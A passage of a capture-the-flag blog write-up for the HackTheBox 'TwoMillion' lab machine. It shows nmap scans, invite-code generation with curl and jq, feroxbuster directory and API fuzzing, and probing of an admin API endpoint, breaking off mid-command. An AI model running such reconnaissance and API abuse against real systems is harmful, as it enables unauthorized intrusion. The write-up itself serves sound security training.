<!doctype html><html lang=en><head><meta charset=UTF-8><meta http-equiv=X-UA-Compatible content="ie=edge"><meta name=viewport content="width=device-width,initial-scale=1"><meta name=mobile-web-app-capable content="yes"><meta name=apple-mobile-web-app-capable content="yes"><meta name=application-name content><meta name=apple-mobile-web-app-status-bar-style content="#fff"><meta name=apple-mobile-web-app-title content><title>TwoMillion | HackTheBox -
</title><link rel=alternate href=https://h4r1337.github.io/posts/two-million/ hreflang=en><link rel=canonical href=https://h4r1337.github.io/posts/two-million/><link rel=prev href=https://h4r1337.github.io/posts/precious/><link rel=next href=https://h4r1337.github.io/posts/perfection/><meta name=description content="In this easy linux machine we will face the classic hackthebox invite challenge that is required to be solved by the users to register a new account. We will generate the invite code and create a new account then escalate to the admin role by manipulating some api misconfigurations which leads to the access of a new api endpoint with rce vulnerability. We will exploit the rce to gain access to the system and read admin user credentials from the .env file. We then privesc to root by exploiting CVE-2022-0386 and read the final root flag."><meta name=keywords content="HTB,hackthebox,Writeup,Walkthrough,TwoMillion,RCE,command injection,Easy,Linux,php,CVE-2023-0386,OverlayFS"><meta property="og:url" content="https://h4r1337.github.io/posts/two-million/"><meta property="og:site_name" content="h4r1337 blog | CTF writeups"><meta property="og:title" content="TwoMillion | HackTheBox"><meta property="og:description" content="In this easy linux machine we will face the classic hackthebox invite challenge that is required to be solved by the users to register a new account. We will generate the invite code and create a new account then escalate to the admin role by manipulating some api misconfigurations which leads to the access of a new api endpoint with rce vulnerability. We will exploit the rce to gain access to the system and read admin user credentials from the .env file. We then privesc to root by exploiting CVE-2022-0386 and read the final root flag."><meta property="og:locale" content="en"><meta property="og:type" content="article"><meta property="article:section" content="posts"><meta property="article:published_time" content="2023-07-26T21:58:49+05:30"><meta property="article:modified_time" content="2023-07-26T21:58:49+05:30"><meta property="article:tag" content="HackTheBox"><meta property="article:tag" content="Linux"><meta property="article:tag" content="Easy"><meta property="article:tag" content="API"><meta property="article:tag" content="RCE"><meta property="article:tag" content="CVE-2023-0386"><meta property="og:image" content="https://h4r1337.github.io/img/two-million/cover.webp"><meta property="og:see_also" content="https://h4r1337.github.io/posts/resource/"><meta property="og:see_also" content="https://h4r1337.github.io/posts/permx/"><meta property="og:see_also" content="https://h4r1337.github.io/posts/blurry/"><meta property="og:see_also" content="https://h4r1337.github.io/posts/board-light/"><meta property="og:see_also" content="https://h4r1337.github.io/posts/perfection/"><meta property="og:see_also" content="https://h4r1337.github.io/posts/precious/"><meta name=twitter:card content="summary_large_image"><meta name=twitter:image content="https://h4r1337.github.io/img/two-million/cover.webp"><meta name=twitter:title content="TwoMillion | HackTheBox"><meta name=twitter:description content="In this easy linux machine we will face the classic hackthebox invite challenge that is required to be solved by the users to register a new account. We will generate the invite code and create a new account then escalate to the admin role by manipulating some api misconfigurations which leads to the access of a new api endpoint with rce vulnerability. We will exploit the rce to gain access to the system and read admin user credentials from the .env file. We then privesc to root by exploiting CVE-2022-0386 and read the final root flag."><meta name=referrer content="no-referrer-when-downgrade"><link rel=apple-touch-icon sizes=180x180 href=/favicons/apple-touch-icon.png><link rel=icon type=image/png sizes=32x32 href=/favicons/favicon-32x32.png><link rel=icon type=image/png sizes=16x16 href=/favicons/favicon-16x16.png><link rel=manifest href=/favicons/site.webmanifest><link rel=mask-icon href=/favicons/safari-pinned-tab.svg color=#5bbad5><meta name=apple-mobile-web-app-title content="Jekyll Klise"><meta name=application-name content="Jekyll Klise"><meta name=msapplication-TileColor content="#da532c"><meta name=theme-color content="#2c2c2c"><link href=https://unpkg.com/boxicons@2.1.4/css/boxicons.min.css rel=stylesheet><link rel=stylesheet href=/sass/main.min.2480d733c3cd78de5d135eb2d8c0b0f964b2bf1e047d180f4f363bdcc3b23b20.css integrity="sha256-JIDXM8PNeN5dE16y2MCw+WSyvx4EfRgPTzY73MOyOyA="><link rel=stylesheet href=/lib/fontawesome-free/all.min.e5e202e3c899507992952533f57b634722b69b34241d271963559d31aa33ef81.css integrity="sha256-5eIC48iZUHmSlSUz9XtjRyK2mzQkHScZY1WdMaoz74E="></head><body data-theme=dark class=notransition><script>const body=document.body,data=body.getAttribute("data-theme"),initTheme=e=>{e==="dark"?body.setAttribute("data-theme","dark"):e==="light"?body.removeAttribute("data-theme"):localStorage.setItem("theme",data)};initTheme(localStorage.getItem("theme")),setTimeout(()=>body.classList.remove("notransition"),75)</script><script id=partial/analytics.html data-goatcounter=https://h4r1337-blog.goatcounter.com/count async src=//gc.zgo.at/count.js></script><div class=navbar role=navigation><nav class=menu><input type=checkbox id=menu-trigger class=menu-trigger>
<label for=menu-trigger><span class=menu-icon><svg width="24" height="24" viewBox="0 0 512 512"><path d="M64 384H448V341.33H64zm0-106.67H448V234.67H64zM64 128v42.67H448V128z"/></svg>
</span></label><a id=mode href=#><svg class="mode-sunny" width="24" height="24" viewBox="0 0 512 512"><title>LIGHT</title><line x1="256" y1="48" x2="256" y2="96" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="256" y1="416" x2="256" y2="464" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="403.08" y1="108.92" x2="369.14" y2="142.86" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="142.86" y1="369.14" x2="108.92" y2="403.08" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="464" y1="256" x2="416" y2="256" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="96" y1="256" x2="48" y2="256" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="403.08" y1="403.08" x2="369.14" y2="369.14" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="142.86" y1="142.86" x2="108.92" y2="108.92" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><circle cx="256" cy="256" r="80" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/></svg><svg class="mode-moon" width="24" height="24" viewBox="0 0 512 512"><title>DARK</title><line x1="256" y1="48" x2="256" y2="96" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="256" y1="416" x2="256" y2="464" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="403.08" y1="108.92" x2="369.14" y2="142.86" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="142.86" y1="369.14" x2="108.92" y2="403.08" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="464" y1="256" x2="416" y2="256" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="96" y1="256" x2="48" y2="256" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="403.08" y1="403.08" x2="369.14" y2="369.14" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><line x1="142.86" y1="142.86" x2="108.92" y2="108.92" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/><circle cx="256" cy="256" r="80" style="stroke-linecap:round;stroke-miterlimit:10;stroke-width:32px"/></svg></a><div class=trigger><div class=trigger-container><a class=menu-link href=/ title=home>home
</a><a class=menu-link href=/posts title=posts>posts
</a><a class=menu-link href=/series title=series>series
</a><a class=menu-link href=/resume.pdf title=resume>resume
</a><a class=menu-link href=/whoami title=whoami>whoami
</a><a class="menu-link rss" href=/index.xml><svg width="17" height="17" viewBox="0 0 512 512" fill="#ed812e"><title>RSS</title><path d="M108.56 342.78a60.34 60.34.0 1060.56 60.44 60.63 60.63.0 00-60.56-60.44z"/><path d="M48 186.67v86.55c52 0 101.94 15.39 138.67 52.11s52 86.56 52 138.67h86.66c0-151.56-125.66-277.33-277.33-277.33z"/><path d="M48 48v86.56c185.25.0 329.22 144.08 329.22 329.44H464C464 234.66 277.67 48 48 48z"/></svg></a></div></div></nav></div><div class="wrapper post"><main class=page-content aria-label=Content><article itemscope itemtype=https://schema.org/BlogPosting><header class=header><div class=tags><span itemprop=keywords><a href=https://h4r1337.github.io/tags/hackthebox/ class=tag>HACKTHEBOX</a>
,
<a href=https://h4r1337.github.io/tags/linux/ class=tag>LINUX</a>
,
<a href=https://h4r1337.github.io/tags/easy/ class=tag>EASY</a>
,
<a href=https://h4r1337.github.io/tags/api/ class=tag>API</a>
,
<a href=https://h4r1337.github.io/tags/rce/ class=tag>RCE</a>
,
<a href=https://h4r1337.github.io/tags/cve-2023-0386/ class=tag>CVE-2023-0386</a>
,
<a href=https://h4r1337.github.io/tags/htb-invite-challenge/ class=tag>HTB-INVITE-CHALLENGE</a>
,
<a href=https://h4r1337.github.io/tags/jq/ class=tag>JQ</a>
,
<a href=https://h4r1337.github.io/tags/php/ class=tag>PHP</a>
,
<a href=https://h4r1337.github.io/tags/overlayfs/ class=tag>OVERLAYFS</a></span></div><h1 class=header-title itemprop=headline>TwoMillion | HackTheBox</h1><div class=post-meta><time datetime="2023-07-26 21:58:49 +0530 +0530" itemprop=datePublished>2023-07-26
</time><span itemprop=author itemscope itemtype=https://schema.org/Person><span itemprop=name>h4r1337</span>
</span><time hidden datetime="2023-07-26 21:58:49 +0530 +0530" itemprop=dateModified></time>
<span hidden itemprop=publisher itemtype=Person>h4r1337</span>
<span hidden itemprop=mainEntityOfPage>In this easy linux machine we will face the classic hackthebox invite challenge that is required to be solved by the users to register a new account. We will generate the invite code and create a new account then escalate to the admin role by manipulating some api misconfigurations which leads to the access of a new api endpoint with rce vulnerability. We will exploit the rce to gain access to the system and read admin user credentials from the .env file. We then privesc to root by exploiting CVE-2022-0386 and read the final root flag.</span></div></header><div class=page-content itemprop=articleBody><h3 id=overview><a href=#overview class=anchor-head aria-label=Anchor></a>Overview</h3><figure><img src=/img/two-million/cover.webp></figure><table><thead><tr><th style=text-align:center>Title</th><th style=text-align:center><a href=https://app.hackthebox.com/machines/TwoMillion>TwoMillion</a></th></tr></thead><tbody><tr><td style=text-align:center>Difficulty</td><td style=text-align:center>Easy</td></tr><tr><td style=text-align:center>Machine</td><td style=text-align:center>Linux</td></tr><tr><td style=text-align:center>Makers</td><td style=text-align:center><a href=https://app.hackthebox.com/users/31190><img src=https://www.hackthebox.com/badge/image/31190 alt style=display:unset></a><br><br><a href=https://app.hackthebox.com/users/114053><img src=https://www.hackthebox.com/badge/image/114053 alt style=display:unset></a></td></tr></tbody></table><div class="alert alert-tip collapsed"><div class=alert-heading-box onclick=toggleAlert(this)><i class="bx bx-bulb"></i><p class=alert-heading>About TwoMillion</p><i class='bx bx-chevron-down collapsed'></i></div><div class=alert-content style=display:none><p>In this easy linux machine we will face the classic hackthebox invite challenge that is required to be solved by the users to register a new account. We will generate the invite code and create a new account then escalate to the admin role by manipulating some api misconfigurations which leads to the access of a new api endpoint with rce vulnerability. We will exploit the rce to gain access to the system and read admin user credentials from the <code>.env</code> file. We then privesc to root by exploiting <strong><code>CVE-2023-0386</code></strong> and read the final root flag.</p></div></div><script>function toggleAlert(e){var t=e.parentElement,s=t.querySelector(".alert-content"),n=e.querySelectorAll("i")[1];t.classList.toggle("open"),t.classList.toggle("collapsed"),t.classList.contains("open")?(s.style.display="block",n.classList.remove("open"),n.classList.add("collapsed")):(n.classList.remove("collapsed"),n.classList.add("open"),s.style.display="none")}</script><h2 id=information-gathering><a href=#information-gathering class=anchor-head aria-label=Anchor></a>Information Gathering</h2><p>Scan all open TCP ports:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span> nmap -p- -T4 --min-rate <span style=color:#d3869b>10000</span> 10.10.11.221 -oA nmap/ports
</span></span><span style=display:flex><span>Starting Nmap 7.80 <span style=color:#fe8019>(</span> https://nmap.org <span style=color:#fe8019>)</span> at 2023-07-25 16:21 IST
</span></span><span style=display:flex><span>Nmap scan report <span style=color:#fe8019>for</span> 10.10.11.221
</span></span><span style=display:flex><span>Host is up <span style=color:#fe8019>(</span>0.27s latency<span style=color:#fe8019>)</span>.
</span></span><span style=display:flex><span>Not shown: <span style=color:#d3869b>65499</span> filtered ports, <span style=color:#d3869b>34</span> closed ports
</span></span><span style=display:flex><span>PORT   STATE SERVICE
</span></span><span style=display:flex><span>22/tcp open  ssh
</span></span><span style=display:flex><span>80/tcp open  http
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>Nmap <span style=color:#fe8019>done</span>: <span style=color:#d3869b>1</span> IP address <span style=color:#fe8019>(</span><span style=color:#d3869b>1</span> host up<span style=color:#fe8019>)</span> scanned in 40.02 seconds
</span></span></code></pre></div><p>Further scan the open ports with default script and service scan flags:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span> nmap -p22,80 -sC -sV 10.10.11.221 -oA nmap/service
</span></span><span style=display:flex><span>Starting Nmap 7.80 <span style=color:#fe8019>(</span> https://nmap.org <span style=color:#fe8019>)</span> at 2023-07-25 16:24 IST
</span></span><span style=display:flex><span>Nmap scan report <span style=color:#fe8019>for</span> 10.10.11.221
</span></span><span style=display:flex><span>Host is up <span style=color:#fe8019>(</span>0.66s latency<span style=color:#fe8019>)</span>.
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>PORT   STATE SERVICE VERSION
</span></span><span style=display:flex><span>22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 <span style=color:#fe8019>(</span>Ubuntu Linux; protocol 2.0<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>80/tcp open  http    nginx
</span></span><span style=display:flex><span>|_http-title: Did not follow redirect to http://2million.htb/
</span></span><span style=display:flex><span>Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
</span></span><span style=display:flex><span>Nmap <span style=color:#fe8019>done</span>: <span style=color:#d3869b>1</span> IP address <span style=color:#fe8019>(</span><span style=color:#d3869b>1</span> host up<span style=color:#fe8019>)</span> scanned in 20.33 seconds
</span></span></code></pre></div><figure><img src=/img/two-million/service-scan.webp></figure><p>Let&rsquo;s add the domain name to the <code>/etc/hosts</code> file.</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span> sudo <span style=color:#fabd2f>echo</span> <span style=color:#b8bb26>&#34;10.10.11.221 2million.htb&#34;</span> &gt;&gt; /etc/hosts
</span></span></code></pre></div><p>Now scan the port 80 again to see if anything changes:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span> nmap -p80 -sC -sV 10.10.11.221 -oA nmap/http
</span></span><span style=display:flex><span>Starting Nmap 7.80 <span style=color:#fe8019>(</span> https://nmap.org <span style=color:#fe8019>)</span> at 2023-07-25 16:39 IST
</span></span><span style=display:flex><span>Nmap scan report <span style=color:#fe8019>for</span> 2million.htb <span style=color:#fe8019>(</span>10.10.11.221<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>Host is up <span style=color:#fe8019>(</span>0.32s latency<span style=color:#fe8019>)</span>.
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>PORT   STATE SERVICE VERSION
</span></span><span style=display:flex><span>80/tcp open  http    nginx
</span></span><span style=display:flex><span>| http-cookie-flags:
</span></span><span style=display:flex><span>|   /:
</span></span><span style=display:flex><span>|     PHPSESSID:
</span></span><span style=display:flex><span>|_      httponly flag not <span style=color:#fabd2f>set</span>
</span></span><span style=display:flex><span>|_http-title: Hack The Box :: Penetration Testing Labs
</span></span><span style=display:flex><span>|_http-trane-info: Problem with XML parsing of /evox/about
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span>Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
</span></span><span style=display:flex><span>Nmap <span style=color:#fe8019>done</span>: <span style=color:#d3869b>1</span> IP address <span style=color:#fe8019>(</span><span style=color:#d3869b>1</span> host up<span style=color:#fe8019>)</span> scanned in 16.26 seconds
</span></span></code></pre></div><p>Nothing interesting&mldr;</p><hr><h3 id=port-80---http-nginx><a href=#port-80---http-nginx class=anchor-head aria-label=Anchor></a>Port 80 - HTTP (Nginx)</h3><figure><img src=/img/two-million/port-80.webp></figure><p>As I said earlier, in order to register a new account we have to solve this challenge:</p><figure><img src=/img/two-million/htb-invite-challenge.webp></figure><p>I will be going through the challenge without detailed explanation assuming that you guys know the stuff already.</p><h4 id=generate-invite-code><a href=#generate-invite-code class=anchor-head aria-label=Anchor></a>Generate invite code:</h4><p>Send a post request to <code>/api/v1/invite/generate</code></p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span> curl -XPOST <span style=color:#b8bb26>&#39;http://2million.htb/api/v1/invite/generate&#39;</span>
</span></span></code></pre></div><p>The code is encoded in base64 you can either decode it using <code>base64 -d</code> or be more cool and use <a href=https://jqlang.github.io/jq/><code>jq</code></a> instead. We can use the <code>@base64d</code> format string to decode base64 encoding.</p><ul><li><code>-r</code> flag is used to get raw output of the filter (i.e. without quotes)</li><li><code>.data.code</code> is used to get the value of <code>code</code> inside <code>data</code></li><li>we then pipe the output into <code>@base64d</code> format string to decode the base64 value</li></ul><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span> curl -XPOST <span style=color:#b8bb26>&#39;http://2million.htb/api/v1/invite/generate&#39;</span> --silent | jq -r <span style=color:#b8bb26>&#39;.data.code | @base64d&#39;</span>
</span></span><span style=display:flex><span>2SLRO-WDS71-6ECIA-BTIJ5
</span></span></code></pre></div><figure><img src=/img/two-million/invite-generate.webp></figure><p>Now using this invite code we can register a new account and check the functionalities.</p><h4 id=fuzzing-time><a href=#fuzzing-time class=anchor-head aria-label=Anchor></a>Fuzzing time:</h4><p>I am using <a href=https://github.com/epi052/feroxbuster>Feroxbuster</a> and dirsearch wordlist for a quick scan:</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span> feroxbuster -u http://2million.htb/ --no-recursion --wordlist /usr/share/wordlists/seclists/Discovery/Web-Content/dirsearch.txt
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span> ___  ___  __   __     __      __         __   ___
</span></span><span style=display:flex><span>|__  |__  |__<span style=color:#fe8019>)</span> |__<span style=color:#fe8019>)</span> | /  <span style=color:#b8bb26>`</span>    /  <span style=color:#b8bb26>\ \_</span>/ | |  <span style=color:#b8bb26>\ </span>|__
</span></span><span style=display:flex><span>|    |___ |  <span style=color:#b8bb26>\ </span>|  <span style=color:#b8bb26>\ </span>| <span style=color:#b8bb26>\_</span>_,    <span style=color:#b8bb26>\_</span>_/ / <span style=color:#b8bb26>\ </span>| |__/ |___
</span></span><span style=display:flex><span>by Ben <span style=color:#b8bb26>&#34;epi&#34;</span> Risher 🤓                 ver: 2.7.3
</span></span><span style=display:flex><span>───────────────────────────┬──────────────────────
</span></span><span style=display:flex><span> 🎯  Target Url            │ http://2million.htb/
</span></span><span style=display:flex><span> 🚀  Threads               │ <span style=color:#d3869b>50</span>
</span></span><span style=display:flex><span> 📖  Wordlist              │ /usr/share/wordlists/seclists/Discovery/Web-Content/dirsearch.txt
</span></span><span style=display:flex><span> 👌  Status Codes          │ <span style=color:#fe8019>[</span>200, 204, 301, 302, 307, 308, 401, 403, 405, 500<span style=color:#fe8019>]</span>
</span></span><span style=display:flex><span> 💥  Timeout <span style=color:#fe8019>(</span>secs<span style=color:#fe8019>)</span>        │ <span style=color:#d3869b>7</span>
</span></span><span style=display:flex><span> 🦡  User-Agent            │ feroxbuster/2.7.3
</span></span><span style=display:flex><span> 💉  Config File           │ /home/h4r1337/.config/feroxbuster/ferox-config.toml
</span></span><span style=display:flex><span> 🏁  HTTP methods          │ <span style=color:#fe8019>[</span>GET<span style=color:#fe8019>]</span>
</span></span><span style=display:flex><span> 🚫  Do Not Recurse        │ <span style=color:#fabd2f>true</span>
</span></span><span style=display:flex><span> 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
</span></span><span style=display:flex><span>───────────────────────────┴──────────────────────
</span></span><span style=display:flex><span> 🏁  Press <span style=color:#fe8019>[</span>ENTER<span style=color:#fe8019>]</span> to use the Scan Management Menu™
</span></span><span style=display:flex><span>──────────────────────────────────────────────────
</span></span><span style=display:flex><span>WLD      GET        7l       11w      162c Got <span style=color:#d3869b>301</span> <span style=color:#fe8019>for</span> http://2million.htb/39a396fcdf9146a789798c2d83ce42ec <span style=color:#fe8019>(</span>url length: 32<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>WLD         -         -         - http://2million.htb/39a396fcdf9146a789798c2d83ce42ec <span style=color:#fe8019>=</span>&gt; http://2million.htb/404
</span></span><span style=display:flex><span>WLD      GET         -         -         - Wildcard response is static; auto-filtering <span style=color:#d3869b>162</span> responses; toggle this behavior by using --dont-filter
</span></span><span style=display:flex><span>WLD      GET        7l       11w      162c Got <span style=color:#d3869b>301</span> <span style=color:#fe8019>for</span> http://2million.htb/e4a3055cc9a64e0bb20aacb1d4ae37ffb441b4c8fcf5452f9ab15d4b36d50eda7b7fbd4b1d82425c95406f6fd304e83c <span style=color:#fe8019>(</span>url length: 96<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>WLD         -         -         - http://2million.htb/e4a3055cc9a64e0bb20aacb1d4ae37ffb441b4c8fcf5452f9ab15d4b36d50eda7b7fbd4b1d82425c95406f6fd304e83c <span style=color:#fe8019>=</span>&gt; http://2million.htb/404
</span></span><span style=display:flex><span><span style=color:#d3869b>200</span>      GET     1242l     3326w        0c http://2million.htb/
</span></span><span style=display:flex><span><span style=color:#d3869b>200</span>      GET       46l      152w        0c http://2million.htb/404
</span></span><span style=display:flex><span><span style=color:#d3869b>401</span>      GET        0l        0w        0c http://2million.htb/api
</span></span><span style=display:flex><span><span style=color:#d3869b>403</span>      GET        7l        9w      146c http://2million.htb/assets/
</span></span><span style=display:flex><span><span style=color:#d3869b>403</span>      GET        7l        9w      146c http://2million.htb/controllers/
</span></span><span style=display:flex><span><span style=color:#d3869b>403</span>      GET        7l        9w      146c http://2million.htb/css/
</span></span><span style=display:flex><span><span style=color:#d3869b>403</span>      GET        7l        9w      146c http://2million.htb/fonts/
</span></span><span style=display:flex><span><span style=color:#d3869b>302</span>      GET        0l        0w        0c http://2million.htb/home <span style=color:#fe8019>=</span>&gt; http://2million.htb/
</span></span><span style=display:flex><span><span style=color:#d3869b>403</span>      GET        7l        9w      146c http://2million.htb/images/
</span></span><span style=display:flex><span><span style=color:#d3869b>200</span>      GET       96l      285w        0c http://2million.htb/invite
</span></span><span style=display:flex><span><span style=color:#d3869b>403</span>      GET        7l        9w      146c http://2million.htb/js/
</span></span><span style=display:flex><span><span style=color:#d3869b>302</span>      GET        0l        0w        0c http://2million.htb/logout <span style=color:#fe8019>=</span>&gt; http://2million.htb/
</span></span><span style=display:flex><span><span style=color:#d3869b>200</span>      GET     1242l     3326w        0c http://2million.htb/views/
</span></span><span style=display:flex><span><span style=color:#fe8019>[</span><span style=color:#928374;font-style:italic>####################] - 1m     13193/13193   0s      found:15      errors:0</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>[</span><span style=color:#928374;font-style:italic>####################] - 1m     13195/13193   182/s   http://2million.htb/</span>
</span></span></code></pre></div><figure><img src=/img/two-million/fuzzing.webp></figure><p>Let&rsquo;s check further inside the <code>/api</code> endpoint using some specific wordlists from <a href=https://github.com/danielmiessler/SecLists.git>seclists</a></p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span> feroxbuster -u http://2million.htb/api/ --wordlist /usr/share/wordlists/seclists/Discovery/Web-Content/api/objects.txt
</span></span><span style=display:flex><span>
</span></span><span style=display:flex><span> ___  ___  __   __     __      __         __   ___
</span></span><span style=display:flex><span>|__  |__  |__<span style=color:#fe8019>)</span> |__<span style=color:#fe8019>)</span> | /  <span style=color:#b8bb26>`</span>    /  <span style=color:#b8bb26>\ \_</span>/ | |  <span style=color:#b8bb26>\ </span>|__
</span></span><span style=display:flex><span>|    |___ |  <span style=color:#b8bb26>\ </span>|  <span style=color:#b8bb26>\ </span>| <span style=color:#b8bb26>\_</span>_,    <span style=color:#b8bb26>\_</span>_/ / <span style=color:#b8bb26>\ </span>| |__/ |___
</span></span><span style=display:flex><span>by Ben <span style=color:#b8bb26>&#34;epi&#34;</span> Risher 🤓                 ver: 2.7.3
</span></span><span style=display:flex><span>───────────────────────────┬──────────────────────
</span></span><span style=display:flex><span> 🎯  Target Url            │ http://2million.htb/api/
</span></span><span style=display:flex><span> 🚀  Threads               │ <span style=color:#d3869b>50</span>
</span></span><span style=display:flex><span> 📖  Wordlist              │ /usr/share/wordlists/seclists/Discovery/Web-Content/api/objects.txt
</span></span><span style=display:flex><span> 👌  Status Codes          │ <span style=color:#fe8019>[</span>200, 204, 301, 302, 307, 308, 401, 403, 405, 500<span style=color:#fe8019>]</span>
</span></span><span style=display:flex><span> 💥  Timeout <span style=color:#fe8019>(</span>secs<span style=color:#fe8019>)</span>        │ <span style=color:#d3869b>7</span>
</span></span><span style=display:flex><span> 🦡  User-Agent            │ feroxbuster/2.7.3
</span></span><span style=display:flex><span> 💉  Config File           │ /home/h4r1337/.config/feroxbuster/ferox-config.toml
</span></span><span style=display:flex><span> 🏁  HTTP methods          │ <span style=color:#fe8019>[</span>GET<span style=color:#fe8019>]</span>
</span></span><span style=display:flex><span> 🔃  Recursion Depth       │ <span style=color:#d3869b>4</span>
</span></span><span style=display:flex><span> 🎉  New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
</span></span><span style=display:flex><span>───────────────────────────┴──────────────────────
</span></span><span style=display:flex><span> 🏁  Press <span style=color:#fe8019>[</span>ENTER<span style=color:#fe8019>]</span> to use the Scan Management Menu™
</span></span><span style=display:flex><span>──────────────────────────────────────────────────
</span></span><span style=display:flex><span>WLD      GET        7l       11w      162c Got <span style=color:#d3869b>301</span> <span style=color:#fe8019>for</span> http://2million.htb/api/5030f00dc2f645de8293e52d19e06e72 <span style=color:#fe8019>(</span>url length: 32<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>WLD         -         -         - http://2million.htb/api/5030f00dc2f645de8293e52d19e06e72 <span style=color:#fe8019>=</span>&gt; http://2million.htb/404
</span></span><span style=display:flex><span>WLD      GET         -         -         - Wildcard response is static; auto-filtering <span style=color:#d3869b>162</span> responses; toggle this behavior by using --dont-filter
</span></span><span style=display:flex><span>WLD      GET        7l       11w      162c Got <span style=color:#d3869b>301</span> <span style=color:#fe8019>for</span> http://2million.htb/api/fb7fa5e4ff13410d890e539d08e9ddab5934e9af97514708acd99ccc463694dbb32a685eae8f4ef69d7f71ae7d95fe2f <span style=color:#fe8019>(</span>url length: 96<span style=color:#fe8019>)</span>
</span></span><span style=display:flex><span>WLD         -         -         - http://2million.htb/api/fb7fa5e4ff13410d890e539d08e9ddab5934e9af97514708acd99ccc463694dbb32a685eae8f4ef69d7f71ae7d95fe2f <span style=color:#fe8019>=</span>&gt; http://2million.htb/404
</span></span><span style=display:flex><span><span style=color:#d3869b>401</span>      GET        0l        0w        0c http://2million.htb/api/v1
</span></span><span style=display:flex><span><span style=color:#fe8019>[</span><span style=color:#928374;font-style:italic>####################] - 18s     3133/3133    0s      found:3       errors:0</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>[</span><span style=color:#928374;font-style:italic>####################] - 17s     3135/3133    174/s   http://2million.htb/api/</span>
</span></span></code></pre></div><p>It&rsquo;s showing <code>401</code> so we need an account to view that any way:</p><figure><img src=/img/two-million/api-v1.webp></figure><p>The <code>/api/v1</code> list outs all the available api endpoints and we can see that there&rsquo;s an endpoint to update admin settings <code>/api/v1/admin/settings/update</code>. Let&rsquo;s see what it does.</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span> curl -XPUT <span style=color:#b8bb26>&#39;http://2million.htb/api/v1/admin/settings/update&#39;</span> -H <span style=color:#b8bb26>&#39;Cookie: PHPSESSID=rkdg35h0k13lm3asa5vhjv4lt8&#39;</span>
</span></span><span style=display:flex><span><span style=color:#fe8019>{</span><span style=color:#b8bb26>&#34;status&#34;</span>:<span style=color:#b8bb26>&#34;danger&#34;</span>,<span style=color:#b8bb26>&#34;message&#34;</span>:<span style=color:#b8bb26>&#34;Invalid content type.&#34;</span><span style=color:#fe8019>}</span>
</span></span></code></pre></div><p>It looks like we can follow the error messges to determine all the parameters required.</p><div class=highlight><pre tabindex=0 style=color:#ebdbb2;background-color:#282828;-moz-tab-size:4;-o-tab-size:4;tab-size:4><code class=language-bash data-lang=bash><span style=display:flex><span> curl -XPUT <span style=color:#b8bb26>&#39;http://2million.htb/api/v1/admin/settings/update&#39;</span> -H <span style=color:#b8bb26>&#39;Cookie: PHPSESSID=rkdg35h0k13lm3asa5vhjv4lt8&#39;</span> -H <span style=color:#b8bb26>&#39;Content-Type: application/json&#39;</span>
